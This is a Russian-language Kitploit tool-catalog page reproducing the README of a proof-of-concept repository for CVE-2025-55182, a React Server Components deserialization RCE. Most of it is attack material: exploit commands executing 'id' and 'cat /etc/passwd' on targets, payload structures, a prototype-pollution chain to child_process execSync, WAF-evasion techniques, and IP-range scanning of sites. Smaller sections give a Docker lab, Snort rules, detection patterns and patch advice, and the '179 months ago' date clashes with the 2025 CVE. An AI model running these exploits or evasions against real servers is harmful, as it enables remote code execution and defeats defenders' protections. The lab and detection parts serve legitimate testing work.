Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
Инструменты/GitHubGitHub/zxz3650/cve-2025-55182-poc
Анализ уязвимостейЭксплуатацияОбход IDS/IPSЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

Репозиторий
179 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 POC и Обнаружение

Сборник эксплойтов и средств обнаружения уязвимости небезопасной десериализации React Server Components (RSC)

Информация об уязвимости

  • CVE-ID: CVE-2025-55182
  • Версии под влиянием: React 19.x, Next.js 15.x/16.x (при использовании App Router)
  • Вектор атаки: RCE через загрязнение прототипа при десериализации протокола RSC Flight
  • Степень опасности: Critical (CVSS 10.0)

📦 Компоненты

1. Уязвимая среда (Docker)

  • docker-compose.yml - Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ - Уязвимый код Server Action

2. Инструменты эксплойта

  • exploit_advanced.py - Поддержка множества методов атак (Basic/Advanced/Chunked/Oversize)

3. Сканер уязвимостей

Скачать инструмент
  • rsc_vulnerability_checker_multi.py - Инструмент диагностики уязвимостей для нескольких целей

4. Правила обнаружения IDS

  • rules_priority_based - Набор правил обнаружения на основе приоритета Snort

🚀 Быстрый старт

1. Настройка уязвимой среды

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# http://localhost:3000 접속 확인

2. Диагностика уязвимости

root@kitploit:~
# 단일 URL 테스트
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# 여러 URL 배치 스캔
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# IP 범위 스캔
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# 파일에서 읽기
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. Запуск эксплойта

root@kitploit:~
# 기본 공격
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# 고급 공격 (프로토타입 체인 + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# WAF 우회 - Unicode 인코딩
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# WAF 우회 - Chunked Transfer Encoding
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# WAF 우회 - Oversize Payload (AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# 모든 기법 순차 시도
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. Тестирование сетевого обнаружения

root@kitploit:~
# 공격 트래픽 캡처
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# Snort로 분석
snort -c snort.conf -r attack.pcap -A console -k none

Детали методов эксплойта

Basic Mode

Прямая отправка полезной нагрузки RSC Flight

root@kitploit:~
# Server Action 직접 호출
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Advanced Mode

RCE с использованием загрязнения прототипа (Prototype Pollution)

root@kitploit:~
// 핵심 원리
{
  "then": "$1:__proto__:then",           // Chunk.prototype.then 트리거
  "_response": {                          // fake response 주입
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // Function 생성자 접근
}

Цепочка атаки:

  1. Установка Chunk.prototype.then через загрязнение __proto__
  2. Контроль FormData через внедрение объекта _response
  3. Обработчик $B вызывает response._formData.get(id)
  4. Доступ к Function через цепочку constructor:constructor
  5. Выполнение process.mainModule.require('child_process').execSync(cmd)

Chunked Mode

Распределение шаблонов с использованием Transfer-Encoding

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • Обход сопоставления шаблонов WAF (разделение ключевых слов)
  • Невозможно проверить с помощью одного буфера

Oversize Mode

Обход ограничения размера AWS WAF

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: 처음 8KB만 검사
# 실제 공격 코드를 8KB 이후에 배치

📊 Приоритет правил обнаружения

P0 Rules (SID 2000xxx) - Немедленная блокировка

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + модуль RCE
  • Доступ к /etc/passwd, /etc/shadow, .ssh/id_rsa

📋 Требования

Обязательные

  • Docker & Docker Compose
  • Python 3.8+
  • Библиотека requests
    root@kitploit:~
    pip install requests
    

Дополнительные (для тестирования обнаружения)

  • Snort 2.9+
  • tcpdump

🔍 Использование сканера уязвимостей

Базовое использование

root@kitploit:~
# 단일 URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# 복수 URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

Расширенное использование

root@kitploit:~
# IP 범위 스캔 (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# IP 범위 스캔 (하이픈)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# 파일 입력/출력
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Verbose 모드
python3 rsc_vulnerability_checker_multi.py http://target.com -v

Формат вывода

root@kitploit:~
[VULNERABLE] http://target.com:3000 - React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 - Not vulnerable
[ERROR] http://offline.com:3000 - Connection timeout

🎯 Опции инструмента эксплойта

Режимы атаки

  • --basic: Прямая отправка полезной нагрузки RSC Flight
  • --advanced: Цепочка прототипов + метод thenable
  • --chunked: Фрагментированная отправка Transfer-Encoding
  • --oversize <size>: Полезная нагрузка Oversize (по умолчанию: 65536 байт)
  • --all: Последовательная попытка всех методов

Обход WAF

  • --waf-bypass: Unicode-кодирование (constructor → \u0063onstructor)
  • --chunked: Распределенное размещение шаблонов
  • --oversize: Обход ограничения размера AWS WAF

Прочее

  • -v, --verbose: Подробный вывод
  • -t, --timeout: Тайм-аут запроса (по умолчанию: 10 секунд)

🛡 Защита и обнаружение

На уровне приложения

  1. Обновление React 19.0.0-rc → 19.0.0 (стабильная)
  2. Обновление Next.js 15.0.3 → 15.1.0+
  3. Усиление проверки ввода Server Actions
  4. Отключение экспериментальных функций

На сетевом уровне

  1. Применение правил Snort (rules_priority_based)
  2. Политика WAF:
    • Блокировка ключевого слова __proto__
    • Блокировка шаблона process.mainModule.require
    • Ограничение размера тела POST (< 1MB)
  3. Rate Limiting (ограничение запросов Server Action)

Мониторинг

root@kitploit:~
# Snort 실시간 모니터링
snort -c snort.conf -i eth0 -A console

# 로그 파일 분석
snort -c snort.conf -r network.pcap -A fast

Данная публикация предназначена только для целей исследования, обучения и проверки диагностики.